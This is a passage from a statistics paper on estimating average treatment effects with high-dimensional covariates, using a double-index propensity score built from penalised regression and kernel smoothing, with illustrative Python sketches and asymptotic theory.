\citep{wang2012bayesian,zigler2014uncertainty,talbot2015bayesian}. These methods, however, rely on strong parametric assumptions and encounter burdensome computations when $p$ is not small. \cite{cefalu2017model} applied Bayesian model averaging to doubly-robust estimators, averaging doubly-robust estimates over posterior model probabilities of a large collection of combinations of parametric models for the nuisance functions. Priors that prefer models not including covariates belonging to $\mathcal{A}_{\pi}\cap\mathcal{A}_{\mu}^c$ ease the computations. Despite this innovation, the computations could still be burdensome and possibly infeasible for large $p$. Most of the aforementioned methods did not consider asymptotic properties allowing $p$ to diverge with $n$.
We consider an IPW-based approach to estimate treatment effects with possibly high-dimensional $\mathbf{X}$. We first use regularized regression to estimate a parametric model for $\pi_1(\mathbf{x})$. Since this neglects associations between $\mathbf{X}$ and $Y$, we also use regularized regression to estimate a model for $\mu_k(\mathbf{x})$, for $k=0,1$. We then calibrate the initial PS estimates by performing nonparametric smoothing of $T$ over the linear predictors for $\mathbf{X}$ from both the initial PS and outcome models. Smoothing over the linear predictors from the outcome model, which can be viewed as a working prognostic score \citep{hansen2008prognostic}, uses the variation in $\mathbf{X}$ predictive of $Y$ to inform estimation of the calibrated PS. We show that our proposed estimator is doubly-robust and locally semiparametric efficient for the ATE under a nonparametric model. Moreover, we show that it achieves potentially substantial gains in robustness and efficiency under misspecification of working models for $\pi_1(\mathbf{x})$ and $\mu_k(\mathbf{x})$. The results are shown to hold allowing $p$ to diverge with $n$ under sparsity assumptions with suitable regularization. The broad approach is similar to a method proposed for estimating mean outcomes in the presence of data missing at random \citep{hu2012semiparametric}, except we use the double-score to estimate a PS instead of an outcome model.
In contrast to their results, we show that a higher-order kernel is required due to the two-dimensional smoothing, find explicit efficiency gains under misspecification of the outcome model, and consider asymptotics with diverging $p$. The combined use of PS and prognostic scores has also recently been suggested for matching and subclassification \citep{leacy2014joint}, but the theoretical properties have not been established. The rest of this paper is organized as follows. The method is introduced in Section \ref{s:method} and its asymptotic properties are discussed in Section \ref{s:asymptotics}. A perturbation-resampling method is proposed for inference in Section \ref{s:perturbation}. Numerical studies including simulations and applications to estimating treatment effects in an EMR study and a cohort study with a large number of covariates are presented in Section \ref{s:numerical}. We conclude with some additional discussion in Section \ref{s:discussion}. Regularity conditions and proofs are relegated to the Web Appendices.
\section{Method} \label{s:method}
\subsection{Notations and Problem Setup}
Let $\mathbf{Z}_i = (Y_i,T_i,\mathbf{X}_i^{\sf \tiny T})^{\sf \tiny T}$ be the observed data for the $i$th subject, where $Y_i$ is an outcome that could be modeled by a generalized linear model (GLM), $T_i\in\{ 0,1\}$ a binary treatment, and $\mathbf{X}_i$ is a $p$-dimensional vector of covariates
with compact support $\mathcal{X}\subseteq\mathbb{R}^{p}$. Here we allow $p$ to diverge with $n$ such that $\log(p)/\log(n) \to \nu$, for $\nu \in [0,1)$. The observed data consists of $n$ independent and identically distributed (iid) observations $\mathscr{D}=\{ \mathbf{Z}_i : i=1,\ldots,n\}$ drawn from the distribution $\mathbb P$. Let $Y_i^{(1)}$ and $Y_i^{(0)}$ denote the counterfactual outcomes \citep{rubin1974estimating} had an individual been treated with treatment $1$ or $0$. Based on $\mathscr{D}$, we want to make inferences about the average treatment effect (ATE):
\begin{align}
\Delta = \mathbb E\{ Y^{(1)}\} - \mathbb E\{ Y^{(0)}\} = \mu_1 - \mu_0.
\end{align}
For identifiability, we require the following standard causal inference assumptions:
\begin{align}
&Y = T Y^{(1)} + (1-T) Y^{(0)} \text{ with probability } 1\label{a:consi}\\
&\pi_1(\mathbf{x}) \in [\epsilon_{\pi},1-\epsilon_{\pi}] \text{ for some } \epsilon_{\pi} >0, \text{ when } \mathbf{x} \in \mathcal{X} \label{a:posi}\\
&Y^{(1)} \perp\!\!\!\perp T \mid \mathbf{X} \text{ and } Y^{(0)}\perp\!\!\!\perp T \mid \mathbf{X}, \label{a:nuca}
\end{align}
where $\pi_k(\mathbf{x}) = \mathbb P(T=k\mid \mathbf{X}=\mathbf{x})$, for $k=0,1$. Through the third condition we assume from the outset that no unmeasured confounding holds given the entire $\mathbf{X}$, which could be plausible when a large set of baseline covariates are included in $\mathbf{X}$. Under these assumptions, it is well-known that $\Delta$ can be identified from the observed data distribution $\mathbb P$ through the g-formula \citep{robins1986new}:
\begin{align}
\Delta^* = \mathbb E\{ \mu_1(\mathbf{X}) - \mu_0(\mathbf{X})\} = \mathbb E\left\{ \frac{I(T=1)Y}{\pi_1(\mathbf{X})}-\frac{I(T=0)Y}{\pi_0(\mathbf{X})}\right\},
\end{align}
where $\mu_k(\mathbf{x}) = \mathbb E(Y\mid \mathbf{X}=\mathbf{x},T=k)$, for $k=0,1$. We will consider an estimator based on the IPW form that will nevertheless be doubly-robust so that it is consistent under parametric models where either $\pi_k(\mathbf{x})$ or $\mu_k(\mathbf{x})$ is correctly specified.
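As a purely illustrative aside, the agreement between the outcome-regression and IPW forms of $\Delta^*$ can be checked by simulation when the true nuisance functions are known; the data-generating design below is hypothetical and not taken from the paper:

```python
# Monte Carlo check (illustrative only) that the g-formula and IPW forms of
# Delta* coincide when the true pi_1(x) and mu_k(x) are plugged in.
import numpy as np

rng = np.random.default_rng(0)
n = 200_000
X = rng.normal(size=n)
pi1 = 1.0 / (1.0 + np.exp(-X))          # true propensity score
T = rng.binomial(1, pi1)
Y = 1.0 + T + X + rng.normal(size=n)    # implies a true ATE of 1

# g-formula with the true outcome regressions mu_1(x) = 2 + x, mu_0(x) = 1 + x
g_formula = np.mean((2.0 + X) - (1.0 + X))

# IPW form with the true propensity score
ipw = np.mean(T * Y / pi1 - (1 - T) * Y / (1 - pi1))

print(round(g_formula, 2), round(ipw, 2))  # both near 1
```

The g-formula average is exact here because the true regressions differ by a constant, while the IPW form carries Monte Carlo noise from the inverse weights; both recover the same estimand.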
\subsection{Parametric Models for Nuisance Functions} \label{s:models}
As $\mathbf{X}$ is high-dimensional, we consider parametric modeling as a means to reduce the dimensions of $\mathbf{X}$ when estimating the nuisance functions $\pi_k(\mathbf{x})$ and $\mu_k(\mathbf{x})$. For reference, let $\mathcal{M}_{np}$ be the nonparametric model for the distribution of $\mathbf{Z}$, $\mathbb P$, that has no restrictions on $\mathbb P$ except requiring the second moment of $\mathbf{Z}$ to be finite. Let $\mathcal{M}_{\pi} \subseteq \mathcal{M}_{np}$ and $\mathcal{M}_{\mu} \subseteq \mathcal{M}_{np}$ respectively denote parametric working models under which:
\begin{align}
&\pi_1(\mathbf{x}) = g_{\pi}(\alpha_0+\boldsymbol\alpha^{\sf \tiny T}\mathbf{x}), \label{e:psmod} \\
\text{and } &\mu_k(\mathbf{x}) = g_{\mu}(\beta_0 + \beta_1 k + \boldsymbol\beta_k^{\sf \tiny T}\mathbf{x}), \text{ for } k=0,1,\label{e:ormod}
\end{align}
where $g_{\pi}(\cdot)$ and $g_{\mu}(\cdot)$ are known link functions, and $\vec{\balph}=(\alpha_0,\boldsymbol\alpha^{\sf \tiny T})^{\sf \tiny T}\in\Theta_{\balph} \subseteq \mathbb{R}^{p+1}$ and $\vec{\boldsymbol\beta} = (\beta_0,\beta_1,\boldsymbol\beta_0^{\sf \tiny T},\boldsymbol\beta_1^{\sf \tiny T})^{\sf \tiny T} \in \Theta_{\bbeta} \subseteq \mathbb{R}^{2p+2}$ are unknown parameters.
The specifications in \eqref{e:psmod} or \eqref{e:ormod} could be made more flexible by applying basis expansion functions, such as splines, to $\mathbf{X}$. In \eqref{e:ormod} slopes are allowed to differ by treatment arms to allow for heterogeneous effects of $\mathbf{X}$ between treatments. In data where it is reasonable to assume heterogeneity is weak or nonexistent, it may be beneficial for efficiency to restrict $\boldsymbol\beta_0 = \boldsymbol\beta_1$, in which case \eqref{e:ormod} is simply a main effects model.
We discuss concerns about ancillarity with the main effects model in the \hyperref[s:discussion]{Discussion}.
Regardless of the validity of either working model (i.e. whether $\mathbb P$ belongs in $\mathcal{M}_{\pi} \cup \mathcal{M}_{\mu}$),
we first obtain estimates of $\boldsymbol\alpha$ and $\boldsymbol\beta_k$'s through regularized estimation:
\begin{align}
&(\widehat{\alpha}_0,\widehat{\balph}^{\sf \tiny T})^{\sf \tiny T} = \argmin_{\vec{\balph}}\left\{ - n^{-1}\sum_{i=1}^n \ell_{\pi}(\vec{\balph};T_i,\mathbf{X}_i) + p_{\pi}(\vec{\balph}_{\{-1\}}; \lambda_{n})\right\} \label{e:psest}\\
&(\widehat{\beta}_0,\widehat{\beta}_1,\widehat{\boldsymbol\beta}_0^{\sf \tiny T},\widehat{\boldsymbol\beta}_1^{\sf \tiny T})^{\sf \tiny T} = \argmin_{\vec{\boldsymbol\beta}}\left\{ - n^{-1}\sum_{i=1}^n \ell_{\mu}(\vec{\boldsymbol\beta};\mathbf{Z}_i) + p_{\mu}(\vec{\boldsymbol\beta}_{\{-1\}};\lambda_{n})\right\}, \label{e:orest}
\end{align}
where $\ell_{\pi}(\vec{\balph};T_i,\mathbf{X}_i)$ denotes the log-likelihood for $\vec{\balph}$ under $\mathcal{M}_{\pi}$ given $T_i$ and $\mathbf{X}_i$, $\ell_{\mu}(\vec{\boldsymbol\beta};\mathbf{Z}_i)$ is a log-likelihood for $\vec{\boldsymbol\beta}$ from a GLM suitable for the outcome type of $Y$ under $\mathcal{M}_{\mu}$ given $\mathbf{Z}_i$, and, for any vector $\mathbf{v}$, $\mathbf{v}_{\{-1\}}$ denotes the subvector of $\mathbf{v}$ excluding the first element. We require penalty functions $p_{\pi}(\mathbf{u};\lambda)$ and $p_{\mu}(\mathbf{u};\lambda)$ to be chosen such that the oracle properties \citep{fan2001variable} hold. An example is the adaptive LASSO \citep{zou2006adaptive}, where $p_{\pi}(\vec{\balph}_{\{-1\}};\lambda_n) =\lambda_n \sum_{j=1}^p \abs{\alpha_j}/\abs{\widetilde{w}_{\pi,j}}^{\gamma} $ with initial weights $\widetilde{w}_{\pi,j}$ estimated from ridge regression, tuning parameter $\lambda_n$ such that $\lambda_n\sqrt{n} \to 0$ and $\lambda_n n^{(1-\nu)(1+\gamma)/2}\to\infty$, and $\gamma > 2\nu/(1-\nu)$ \citep{zou2009adaptive}.
When additional structure is known,
other penalties yielding the oracle properties such as adaptive elastic net \citep{zou2009adaptive} or Group LASSO \citep{wang2008note} penalties can also be used. In principle other variable selection and estimation procedures \citep{wilson2014confounder,koch2017covariate} can also be used, but the theoretical properties may be difficult to verify without the oracle properties.
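For concreteness, the adaptive LASSO fit of the PS model in \eqref{e:psest} can be sketched in a few lines. This is an illustrative numpy implementation, not the authors' code: it substitutes an unpenalized logistic fit for the ridge initial estimator of the weights $\widetilde{w}_{\pi,j}$ and uses a simple proximal-gradient (ISTA) solver with a fixed tuning parameter.

```python
# Illustrative adaptive-LASSO logistic regression for the PS model:
# an initial logistic fit supplies covariate-specific weights, then ISTA
# solves the weighted-L1 problem, shrinking irrelevant covariates to zero.
import numpy as np

def expit(u):
    return 1.0 / (1.0 + np.exp(-u))

def nll_grad(coef, X1, T):
    # gradient of the average logistic negative log-likelihood
    return X1.T @ (expit(X1 @ coef) - T) / len(T)

def adaptive_lasso_logistic(X, T, lam=0.05, gamma=1.0, step=0.5, iters=3000):
    n, p = X.shape
    X1 = np.hstack([np.ones((n, 1)), X])
    # step 1: initial (here unpenalized) logistic fit for the adaptive weights
    coef = np.zeros(p + 1)
    for _ in range(iters):
        coef -= step * nll_grad(coef, X1, T)
    w = np.abs(coef[1:]) ** gamma + 1e-8
    # step 2: proximal gradient (ISTA) with covariate-specific soft-thresholds
    coef = np.zeros(p + 1)
    for _ in range(iters):
        coef -= step * nll_grad(coef, X1, T)
        thr = step * lam / w                  # intercept is left unpenalized
        coef[1:] = np.sign(coef[1:]) * np.maximum(np.abs(coef[1:]) - thr, 0.0)
    return coef

rng = np.random.default_rng(1)
n, p = 2000, 10
X = rng.normal(size=(n, p))
T = rng.binomial(1, expit(X[:, 0] - X[:, 1]))  # only covariates 0 and 1 active
coef = adaptive_lasso_logistic(X, T)
print(np.nonzero(coef[1:])[0])                 # typically recovers {0, 1}
```

With $\gamma=1$ and fixed $\lambda_n$, the noise covariates receive large effective penalties $\lambda_n/|\widetilde{w}_{\pi,j}|$ and are thresholded exactly to zero, while the two active covariates are retained with only mild shrinkage.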
We assume the true $\boldsymbol\alpha$ and $\boldsymbol\beta_k$'s to be sparse when working models are correctly specified (i.e. when $\mathbb P$ belongs to $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}$).
For example, in EMRs, a large number of covariates extracted from codified or narrative data can be expected to actually be irrelevant to either the outcome or the treatment assignment processes.
Even when $\mathcal{M}_{\pi}$ or $\mathcal{M}_{\mu}$ is not exactly correctly specified, we assume that the correlation between covariates are not so strong such that the limiting values of $\widehat{\balph}$ and $\widehat{\boldsymbol\beta}_k$, $\bar{\boldsymbol\alpha}$ and $\bar{\boldsymbol\beta}_k$, are still sparse. The oracle properties then ensure that the correct support can be selected in large samples. Let $\mathcal{A}_{\boldsymbol\alpha}$ and $\mathcal{A}_{\boldsymbol\beta_k}$ denote the respective support of $\bar{\boldsymbol\alpha}$ and $\bar{\boldsymbol\beta}_k$, regardless of the validity of either working model. By selecting out irrelevant covariates belonging to $\mathcal{A}_{\boldsymbol\alpha}^c \cap \mathcal{A}_{\boldsymbol\beta_k}^c$ when estimating the PS $\pi_k(\mathbf{x})$, the efficiency of subsequent IPW estimators for $\mu_k$ can be expected to improve substantially when $p$ is not small.
The regularization in \eqref{e:psest} selects all variables belonging to $\mathcal{A}_{\boldsymbol\alpha}$, which guards against the misspecification of the model in \eqref{e:psmod} that would result if variables in $\mathcal{A}_{\boldsymbol\alpha}$ were selected out.
But applying regularization to estimate the PS directly through \eqref{e:psest} only may be inefficient because covariates belonging to $\mathcal{A}_{\boldsymbol\alpha}^c \cap \mathcal{A}_{\boldsymbol\beta_k}$ would be selected out \citep{lunceford2004stratification,brookhart2006variable}.
In the following we consider a calibrated PS based on both $\widehat{\balph}^{\sf \tiny T}\mathbf{X}$ and $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$ that addresses this shortcoming.
\subsection{Double-Index Propensity Score and IPW Estimator} \label{s:estimator}
To mitigate the effects of misspecification of \eqref{e:psmod}, one could \emph{calibrate} an initial PS estimate $g_{\pi}(\widehat{\alpha}_0+\widehat{\balph}^{\sf \tiny T}\mathbf{X})$ by performing nonparametric smoothing of $T$ over $\widehat{\balph}^{\sf \tiny T}\mathbf{X}$. This adjusts the initial estimates $g_{\pi}(\widehat{\alpha}_0+\mathbf{X}^{\sf \tiny T}\widehat{\balph})$ closer to the true probability of receiving treatment $1$ given $\widehat{\balph}^{\sf \tiny T}\mathbf{X}$. However, we consider smoothing over not only $\widehat{\balph}^{\sf \tiny T}\mathbf{X}$ but also $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$ to allow variation in covariates predictive of the outcome, i.e. covariates indexed in $\mathcal{A}_{\boldsymbol\beta_k}$, to inform this calibration. In other words, this serves as a means to include covariates indexed in $\mathcal{A}_{\boldsymbol\beta_k}$ in the smoothing, except that such covariates are initially reduced into $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$.
The double-index PS (DiPS) estimator for each treatment is thus given by:
\begin{align}
\widehat{\pi}_k(\mathbf{x};\widehat{\boldsymbol\theta}_k)= \frac{n^{-1}\sum_{j=1}^nK_h\{(\widehat{\balph},\widehat{\boldsymbol\beta}_k)^{\sf \tiny T}(\mathbf{X}_j-\mathbf{x})\}I(T_j=k)}{n^{-1}\sum_{j=1}^n K_h\{(\widehat{\balph},\widehat{\boldsymbol\beta}_k)^{\sf \tiny T}(\mathbf{X}_j-\mathbf{x})\}}, \text{ for } k=0,1,
\end{align}
where $\widehat{\boldsymbol\theta}_k = (\widehat{\balph}^{\sf \tiny T},\widehat{\boldsymbol\beta}_k^{\sf \tiny T})^{\sf \tiny T}$, $K_h(\mathbf{u})= h^{-2}K(\mathbf{u}/h)$, and $K(\mathbf{u})$ is a bivariate $q$-th order kernel function with $q>2$. A higher-order kernel is required here for the asymptotics to be well-behaved, which is the price for estimating the nuisance functions $\pi_k(\mathbf{x})$ using two-dimensional smoothing. This allows for the possibility of negative values for $\widehat{\pi}_k(\mathbf{x};\widehat{\boldsymbol\theta}_k)$. Nevertheless, $\widehat{\pi}_k(\mathbf{x};\widehat{\boldsymbol\theta}_k)$ are nuisance estimates not of direct interest, and we find in numerical studies that negative values occur infrequently and do not compromise the performance of the final estimator.
A monotone transformation of the input scores for each treatment $\widehat{\mathbf{S}}_k = (\widehat{\balph},\widehat{\boldsymbol\beta}_k)^{\sf \tiny T}\mathbf{X}$ can be applied prior to smoothing to improve finite sample performance \citep{wand1991transformations}. In numerical studies, for instance, we applied a probability integral transform based on the normal cumulative distribution function to the standardized scores to obtain approximately uniformly distributed inputs. We also scaled components of $\widehat{\mathbf{S}}_k$ such that a common bandwidth $h$ can be used for both components of the score.
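To make the smoothing step concrete, the following illustrative sketch computes $\widehat{\pi}_1(\mathbf{x};\widehat{\boldsymbol\theta}_1)$ by Nadaraya-Watson smoothing of $T$ over two transformed scores. The choices here are assumptions for illustration only: a Gaussian-based fourth-order product kernel, a probability integral transform of the standardized scores, a fixed bandwidth $h=0.15$, and simulated stand-ins for the fitted scores.

```python
# Illustrative double-index PS: smooth T over the two transformed scores
# with a fourth-order (bias-reducing) product kernel.
import numpy as np
from math import erf, sqrt

def to_uniform(s):
    # probability integral transform of the standardized score
    z = (s - s.mean()) / s.std()
    return np.array([0.5 * (1.0 + erf(v / sqrt(2.0))) for v in z])

def k4(u):
    # fourth-order Gaussian-based kernel: (3 - u^2) * phi(u) / 2
    return 0.5 * (3.0 - u ** 2) * np.exp(-0.5 * u ** 2) / np.sqrt(2.0 * np.pi)

def dips(score_ps, score_out, T, h=0.15):
    # Nadaraya-Watson smoothing of T over the two transformed scores
    s1, s2 = to_uniform(score_ps), to_uniform(score_out)
    K = k4((s1[:, None] - s1[None, :]) / h) * k4((s2[:, None] - s2[None, :]) / h)
    return (K @ T) / K.sum(axis=1)

rng = np.random.default_rng(2)
n = 1000
a = rng.normal(size=n)                  # stand-in for the fitted PS score
b = rng.normal(size=n)                  # stand-in for the fitted outcome score
pi1 = 1.0 / (1.0 + np.exp(-a))          # true PS depends on the first score only
T = rng.binomial(1, pi1)
pi_hat = dips(a, b, T)
print(np.corrcoef(pi_hat, pi1)[0, 1])   # strongly correlated with the true PS
```

Because the fourth-order kernel takes negative values, isolated estimates can fall outside $[0,1]$; the bandwidth here is a fixed illustrative choice rather than a data-driven one.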
With $\pi(\mathbf{x})$ estimated by $\widehat{\pi}_k(\mathbf{x};\widehat{\boldsymbol\theta}_k)$, the estimator for $\Delta$ is given by $\widehat{\Delta} = \widehat{\mu}_1 - \widehat{\mu}_0$, where:
\begin{align}
\widehat{\mu}_k = \left\{ \sum_{i=1}^n \frac{I(T_i = k)}{\widehat{\pi}_k(\mathbf{X}_i;\widehat{\boldsymbol\theta}_k)}\right\}^{-1}\left\{ \sum_{i=1}^n \frac{I(T_i = k)Y_i}{\widehat{\pi}_k(\mathbf{X}_i;\widehat{\boldsymbol\theta}_k)}\right\}, \text{ for } k=0,1.
\end{align}
This is the usual normalized IPW estimator, with the PS given by the double-index PS estimates. In the following, we show that this simple construction leads to an estimator that also possesses the robustness and efficiency properties of the doubly-robust estimator derived from semiparametric efficiency theory \citep{robins1994estimation}, and, in certain scenarios, achieves additional gains in robustness and efficiency.
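A minimal illustrative sketch of this normalized (Hajek-type) IPW step follows, with the true PS standing in for the arm-specific estimates $\widehat{\pi}_k(\mathbf{X}_i;\widehat{\boldsymbol\theta}_k)$ and a hypothetical data-generating design:

```python
# Normalized IPW: for each arm, divide the inverse-weighted sum of outcomes
# by the inverse-weighted sum of indicators, then take the difference.
import numpy as np

def normalized_ipw(Y, T, pi_hat_1, pi_hat_0):
    mu = {}
    for k, pk in ((1, pi_hat_1), (0, pi_hat_0)):
        w = (T == k).astype(float) / pk
        mu[k] = np.sum(w * Y) / np.sum(w)
    return mu[1] - mu[0]

rng = np.random.default_rng(3)
n = 50_000
X = rng.normal(size=n)
pi1 = 1.0 / (1.0 + np.exp(-X))
T = rng.binomial(1, pi1)
Y = 1.0 + 2.0 * T + X + rng.normal(size=n)   # true ATE is 2
print(round(normalized_ipw(Y, T, pi1, 1.0 - pi1), 2))  # near 2
```

Normalizing by the sum of weights rather than by $n$ makes the estimator invariant to rescaling of the weights, which is helpful when the PS estimates are noisy in the tails.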
\section{Asymptotic Robustness and Efficiency Properties} \label{s:asymptotics}
We first directly present the influence function expansion of $\widehat{\Delta}$ in general. Robustness and efficiency results are subsequently derived based on the expansion. To present the influence function expansion, let $\bar{\Delta} = \bar{\mu}_1-\bar{\mu}_0$ be the limiting estimand, with:
\begin{align*}
\bar{\mu}_k = \mathbb E\left\{ \frac{I(T_i =k)Y_i}{\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)}\right\}, \text{ for } k=0,1,
\end{align*}
$\bar{\boldsymbol\theta}_k = (\bar{\boldsymbol\alpha}^{\sf \tiny T},\bar{\boldsymbol\beta}_k^{\sf \tiny T})^{\sf \tiny T}$, and $\pi_k(\mathbf{x};\bar{\boldsymbol\theta}_k) = \mathbb P(T_i = k \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x},\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x})$. Moreover, for any vector $\mathbf{v}$ of length $p$ and any index set $\mathcal{A} \subseteq \{ 1,2,\ldots,p\}$, let $\mathbf{v}_{\mathcal{A}}$ denote the subvector with elements indexed in $\mathcal{A}$.
Let $\widehat{\mathcal{W}}_k = n^{1/2}(\widehat{\mu}_k - \bar{\mu}_k)$ for $k=0,1$ so that $n^{1/2}(\widehat{\Delta} - \bar{\Delta}) = \widehat{\mathcal{W}}_1 - \widehat{\mathcal{W}}_0$. We show in Web Appendix D the following result.
\begin{theorem} \label{t:IFexp}
Suppose that causal assumptions \eqref{a:consi}, \eqref{a:posi}, \eqref{a:nuca} and the regularity conditions in Web Appendix A hold. Let the sparsity of $\bar{\boldsymbol\alpha}$ and $\bar{\boldsymbol\beta}_k$, $\abs{\mathcal{A}_{\boldsymbol\alpha}} = s_{\boldsymbol\alpha}$ and $\abs{\mathcal{A}_{\boldsymbol\beta_k}} = s_{\boldsymbol\beta_k}$, be fixed. If $\log(p)/\log(n) \to \nu$ for $\nu \in [0,1)$,
then, with probability tending to $1$, $\widehat{\mathcal{W}}_k$ has the expansion:
\begin{align}
\widehat{\mathcal{W}}_k &= n^{-1/2}\sum_{i=1}^n \frac{I(T_i =k)Y_i}{\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)} - \left\{ \frac{I(T_i = k)}{\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)}-1\right\}\mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i,\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i,T_i =k ) -\bar{\mu}_k \label{e:IFeff}\\
&\qquad + \mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}}^{\sf \tiny T} n^{1/2}(\widehat{\balph}-\bar{\boldsymbol\alpha})_{\mathcal{A}_{\boldsymbol\alpha}} + \mathbf{v}_{k,\mathcal{A}_{\boldsymbol\beta_k}}^{\sf \tiny T} n^{1/2}(\widehat{\boldsymbol\beta}_k - \bar{\boldsymbol\beta}_k)_{\mathcal{A}_{\boldsymbol\beta_k}} + O_p(n^{1/2}h^q + n^{-1/2}h^{-2}), \label{e:IFnui}
\end{align}
for $k=0,1$, where $\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}}$ and $\mathbf{v}_{k,\mathcal{A}_{\boldsymbol\beta_k}}$ are deterministic vectors, $n^{1/2}(\widehat{\balph}-\bar{\boldsymbol\alpha})_{\mathcal{A}_{\boldsymbol\alpha}} = O_p(1)$, and $n^{1/2}(\widehat{\boldsymbol\beta}_k-\bar{\boldsymbol\beta}_k)_{\mathcal{A}_{\boldsymbol\beta_k}} = O_p(1)$. Under model $\mathcal{M}_{\pi}$, $\mathbf{v}_{k,\mathcal{A}_{\boldsymbol\beta_k}} = \boldsymbol 0$ for $k=0,1$. Under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}$, we additionally have that $\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}} = \boldsymbol 0$ for $k=0,1$.
\end{theorem}
The challenge in showing Theorem \ref{t:IFexp} is to obtain an influence function expansion when the nuisance functions $\pi_k(\mathbf{x})$ are estimated with two-dimensional kernel-smoothing rather than finite-dimensional models. We show in Web Appendix D that a V-statistic projection lemma \citep{newey1994large} can be applied to obtain the expansion in this situation.
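For concreteness, the two-dimensional kernel-smoothing calibration can be sketched as follows (a simplified Nadaraya--Watson smoother over the two fitted indices with a plain second-order Gaussian product kernel; the estimator in \eqref{e:psest} uses a higher-order kernel, and the function below is only illustrative):

```python
import numpy as np

def dips_ps(a_idx, b_idx, t, k, h):
    """Nadaraya-Watson estimate of P(T = k | alpha'X, beta_k'X) at each
    observation, smoothing over the two fitted indices a_idx = alpha_hat'X_i
    and b_idx = beta_hat_k'X_i with a Gaussian product kernel of bandwidth h.
    (Plain second-order kernel here, for illustration only.)"""
    ps = np.empty(len(t))
    for i in range(len(t)):
        w = np.exp(-0.5 * (((a_idx - a_idx[i]) / h) ** 2
                           + ((b_idx - b_idx[i]) / h) ** 2))
        ps[i] = np.sum(w * (t == k)) / np.sum(w)
    return ps

# Demo: the true PS depends on the first index only, via a logistic link.
rng = np.random.default_rng(1)
n = 800
a_idx, b_idx = rng.normal(0, 1, n), rng.normal(0, 1, n)
p_true = 1 / (1 + np.exp(-a_idx))
t = rng.binomial(1, p_true)
ps_hat = dips_ps(a_idx, b_idx, t, 1, 0.4)
```

Because the smoother conditions only on the two scalar indices, the calibration avoids the curse of dimensionality even when $\mathbf{X}$ is high-dimensional.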
Let $\widehat{\Delta}_{dr}$ denote the usual doubly-robust estimator with $\pi_k(\mathbf{x})$ and $\mu_k(\mathbf{x})$ estimated in the same way through \eqref{e:psest} and \eqref{e:orest}. The influence function expansion for $\widehat{\Delta}$ in Theorem \ref{t:IFexp} is nearly identical to that of $\widehat{\Delta}_{dr}$. The terms in \eqref{e:IFeff} are the same, except that $\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)$ and $\mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i,\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i,T_i=k)$ replace the parametric models evaluated at the limiting estimates. The terms in \eqref{e:IFnui} analogously represent the additional contributions from estimating the nuisance parameters. The expansion also shows that asymptotically no contribution from smoothing is incurred. This similarity in the influence functions yields similar desirable robustness and efficiency properties, which are improved upon in some cases due to the calibration through smoothing.
\subsection{Robustness}
In terms of robustness, under $\mathcal{M}_{\pi}$, $\pi_k(\mathbf{x};\bar{\boldsymbol\theta}_k) = \pi_k(\mathbf{x})$ so the limiting estimands are:
\begin{align*}
\bar{\mu}_k = \mathbb E\left\{ \frac{I(T_i = k)Y_i}{\pi_k(\mathbf{X}_i)}\right\} = \mathbb E\{ Y_i^{(k)}\} \text{, for } k =0,1.
\end{align*}
On the other hand, under $\mathcal{M}_{\mu}$, $\mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x},\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x},T_i =k) = \mu_k(\mathbf{x})$ so that:
\begin{align*}
\bar{\mu}_k &= \mathbb E\left\{ \mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i,\bar{\boldsymbol\beta}^{\sf \tiny T}\mathbf{X}_i,T_i =k)\right\} =\mathbb E\left\{ \mu_k(\mathbf{X}_i)\right\} = \mathbb E\{ Y_i^{(k)}\}, \text{ for } k=0,1.
\end{align*}
Thus by Theorem \ref{t:IFexp}, under $\mathcal{M}_{\pi} \cup \mathcal{M}_{\mu}$, $\widehat{\Delta} - \Delta = O_p(n^{-1/2})$ provided that $h=O(n^{-\alpha})$ for $\alpha \in (\frac{1}{2q},\frac{1}{4})$. That is, $\widehat{\Delta}$ is \emph{doubly-robust} for $\Delta$.
Beyond this usual form of double-robustness, if the PS model specification \eqref{e:psmod} is incorrect, we expect the calibration step to at least partially correct for the misspecification since, in large samples, given $\mathbf{x}$, $\pi_k(\mathbf{x};\bar{\boldsymbol\theta}_k)$ is closer to the true $\pi_k(\mathbf{x})$ than the misspecified parametric model $g_{\pi}(\bar{\alpha}_0+\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x})$. In some specific scenarios, the calibration can completely overcome the misspecification of the PS model. For example,
let $\widetilde{\mathcal{M}}_{\pi}$ denote a model for $\mathbb P$ under which:
\begin{align*}
\pi_1(\mathbf{x}) = \widetilde{g}_{\pi}(\boldsymbol\alpha^{\sf \tiny T}\mathbf{x})
\end{align*}
